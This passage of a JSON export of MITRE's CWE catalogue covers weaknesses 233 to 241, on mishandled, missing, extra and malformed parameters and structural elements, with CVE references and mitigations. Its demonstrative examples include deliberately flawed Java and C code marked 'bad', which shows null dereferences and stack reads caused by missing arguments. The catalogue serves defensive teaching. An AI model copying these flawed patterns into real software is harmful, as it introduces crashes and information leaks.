Value","attr":{"@_Date":"2009-03-10"}}]}},"233":{"attr":{"@_ID":"233","@_Name":"Improper Handling of Parameters","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly handle when the expected number of parameters, fields, or arguments is not provided in input, or if those parameters are undefined.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"228","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-110"},"Intro_Text":"This Android application has registered to handle a URL when sent an intent:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"IntentFilter filter = new IntentFilter(\\"com.example.URLHandler.openURL\\");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter);public class UrlHandlerReceiver extends BroadcastReceiver {}","xhtml:br":["","","","","","",""],"xhtml:i":["...","..."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"@Overridepublic void onReceive(Context context, Intent intent) {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if(\\"com.example.URLHandler.openURL\\".equals(intent.getAction())) {}","xhtml:div":{"#text":"String URL = intent.getStringExtra(\\"URLToOpen\\");int length = URL.length();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""],"xhtml:i":"..."}}}}}},"Body_Text":"The application assumes the URL will always be included in the intent. When the URL is not present, the call to getStringExtra() will return null, thus causing a null pointer exception when length() is called."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Parameter Problems"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"39"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Description, Name, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":{"#text":"Parameter Problems","attr":{"@_Date":"2013-07-17"}}}},"234":{"attr":{"@_ID":"234","@_Name":"Failure to Handle Missing Parameter","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"If too few arguments are sent to a function, the function will still pop the expected number of arguments from the stack. Potentially, a variable number of arguments could be exhausted in a function as well.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"233","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability","Access Control"],"Impact":["Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity"],"Note":"There is the potential for arbitrary code execution with privileges of the vulnerable program if function parameter list is exhausted."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"Potentially a program could fail if it needs more arguments then are available."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Build and Compilation","Description":"This issue can be simply combated with the use of proper build process."},{"Phase":"Implementation","Description":"Forward declare all functions. This is the recommended solution. Properly forward declaration of all used functions will result in a compiler error if too few arguments are sent to a function."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"foo_funct(one, two);void foo_funct(int one, int two, int three) {}","xhtml:br":["",""],"xhtml:div":{"#text":"printf(\\"1) %d\\\\n2) %d\\\\n3) %d\\\\n\\", one, two, three);","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void some_function(int foo, ...) {}int main(int argc, char *argv[]) {}","xhtml:div":[{"#text":"int a[3], i;va_list ap;va_start(ap, foo);for (i = 0; i < sizeof(a) / sizeof(int); i++) a[i] = va_arg(ap, int);va_end(ap);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},{"#text":"some_function(17, 42);","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["",""]}}],"Body_Text":"This can be exploited to disclose information with no work whatsoever. In fact, each time this function is run, it will print out the next 4 bytes on the stack after the two numbers sent to it."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-0276","Description":"Server earlier allows remote attackers to cause a denial of service (crash) via an HTTP request with a sequence of \\"%\\" characters and a missing Host field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0276"},{"Reference":"CVE-2002-1488","Description":"Chat client allows remote malicious IRC servers to cause a denial of service (crash) via a PART message with (1) a missing channel or (2) a channel that the user is not in.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1488"},{"Reference":"CVE-2002-1169","Description":"Proxy allows remote attackers to cause a denial of service (crash) via an HTTP request to helpout.exe with a missing HTTP version numbers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1169"},{"Reference":"CVE-2000-0521","Description":"Web server allows disclosure of CGI source code via an HTTP request without the version number.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0521"},{"Reference":"CVE-2001-0590","Description":"Application server allows a remote attacker to read the source code to arbitrary \'jsp\' files via a malformed URL request which does not end with an HTTP protocol specification.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0590"},{"Reference":"CVE-2003-0239","Description":"Chat software allows remote attackers to cause a denial of service via malformed GIF89a headers that do not contain a GCT (Global Color Table) or an LCT (Local Color Table) after an Image Descriptor.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0239"},{"Reference":"CVE-2002-1023","Description":"Server allows remote attackers to cause a denial of service (crash) via an HTTP GET request without a URI.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1023"},{"Reference":"CVE-2002-1236","Description":"CGI crashes when called without any arguments.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1236"},{"Reference":"CVE-2003-0422","Description":"CGI crashes when called without any arguments.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0422"},{"Reference":"CVE-2002-1531","Description":"Crash in HTTP request without a Content-Length field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1531"},{"Reference":"CVE-2002-1077","Description":"Crash in HTTP request without a Content-Length field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1077"},{"Reference":"CVE-2002-1358","Description":"Empty elements/strings in protocol test suite affect many SSH2 servers/clients.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1358"},{"Reference":"CVE-2003-0477","Description":"FTP server crashes in PORT command without an argument.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0477"},{"Reference":"CVE-2002-0107","Description":"Resultant infoleak in web server via GET requests without HTTP/1.0 version string.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0107"},{"Reference":"CVE-2002-0596","Description":"GET request with empty parameter leads to error message infoleak (path disclosure).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0596"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Missing Parameter Error"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Missing parameter"}]},"Notes":{"Note":{"#text":"This entry will be deprecated in a future version of CWE. The term \\"missing parameter\\" was used in both PLOVER and CLASP, with completely different meanings. However, data from both taxonomies was merged into this entry. In PLOVER, it was meant to cover malformed inputs that do not contain required parameters, such as a missing parameter in a CGI request. This entry\'s observed examples and classification came from PLOVER. However, the description, demonstrative example, and other information are derived from CLASP. They are related to an incorrect number of function arguments, which is already covered by CWE-685.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-09","Modification_Importance":"Critical","Modification_Comment":"added maintenance note: this entry will probably be deprecated"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Maintenance_Notes, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Missing Parameter Error","attr":{"@_Date":"2008-04-11"}}}},"235":{"attr":{"@_ID":"235","@_Name":"Improper Handling of Extra Parameters","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not handle or incorrectly handles when the number of parameters, fields, or arguments with the same name exceeds the expected amount.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"233","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"This typically occurs in situations when only one element is expected to be specified."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2003-1014","Description":"MIE. multiple gateway/security products allow restriction bypass using multiple MIME fields with the same name, which are interpreted differently by clients.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1014"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Extra Parameter Error"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"460"}}},"Notes":{"Note":{"#text":"This type of problem has a big role in multiple interpretation vulnerabilities and various HTTP attacks.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Description, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Extra Parameter Error","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Extra Parameter","attr":{"@_Date":"2009-03-10"}}]}},"236":{"attr":{"@_ID":"236","@_Name":"Improper Handling of Undefined Parameters","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not handle or incorrectly handles when a particular parameter, field, or argument name is not defined or supported by the product.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"233","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1488","Description":"Crash in IRC client via PART message from a channel the user is not in.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1488"},{"Reference":"CVE-2001-0650","Description":"Router crash or bad route modification using BGP updates with invalid transitive attribute.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0650"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Undefined Parameter Error"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Undefined Parameter Error","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Undefined Parameter","attr":{"@_Date":"2009-03-10"}}]}},"237":{"attr":{"@_ID":"237","@_Name":"Improper Handling of Structural Elements","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not handle or incorrectly handles inputs that are related to complex structures.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"228","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Element Problems"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Element Problems","attr":{"@_Date":"2009-03-10"}}}},"238":{"attr":{"@_ID":"238","@_Name":"Improper Handling of Incomplete Structural Elements","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not handle or incorrectly handles when a particular structural element is not completely specified.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"237","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Missing Element Error"}},"Notes":{"Note":{"#text":"Can be primary to other problems.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Missing Element Error","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Missing Element","attr":{"@_Date":"2009-03-10"}}]}},"239":{"attr":{"@_ID":"239","@_Name":"Failure to Handle Incomplete Element","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly handle when a particular element is not completely specified.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"237","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"404","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Varies by Context","Unexpected State"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1532","Description":"HTTP GET without \\\\r\\\\n\\\\r\\\\n CRLF sequences causes product to wait indefinitely and prevents other users from accessing it.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1532"},{"Reference":"CVE-2003-0195","Description":"Partial request is not timed out.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0195"},{"Reference":"CVE-2005-2526","Description":"MFV. CPU exhaustion in printer via partial printing request then early termination of connection.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2526"},{"Reference":"CVE-2002-1906","Description":"CPU consumption by sending incomplete HTTP requests and leaving the connections open.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1906"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Incomplete Element"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Incomplete Element","attr":{"@_Date":"2008-04-11"}}}},"240":{"attr":{"@_ID":"240","@_Name":"Improper Handling of Inconsistent Structural Elements","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not handle or incorrectly handles when two or more structural elements should be consistent, but are not.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"237","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"707","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Varies by Context","Unexpected State"]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Inconsistent Elements"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Inconsistent Elements","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Resolve Inconsistent Elements","attr":{"@_Date":"2009-03-10"}}]}},"241":{"attr":{"@_ID":"241","@_Name":"Improper Handling of Unexpected Data Type","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not handle or incorrectly handles when a particular element is not the expected type, e.g. it expects a digit (0-9) but is provided with a letter (A-Z).","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"228","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Varies by Context","Unexpected State"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been 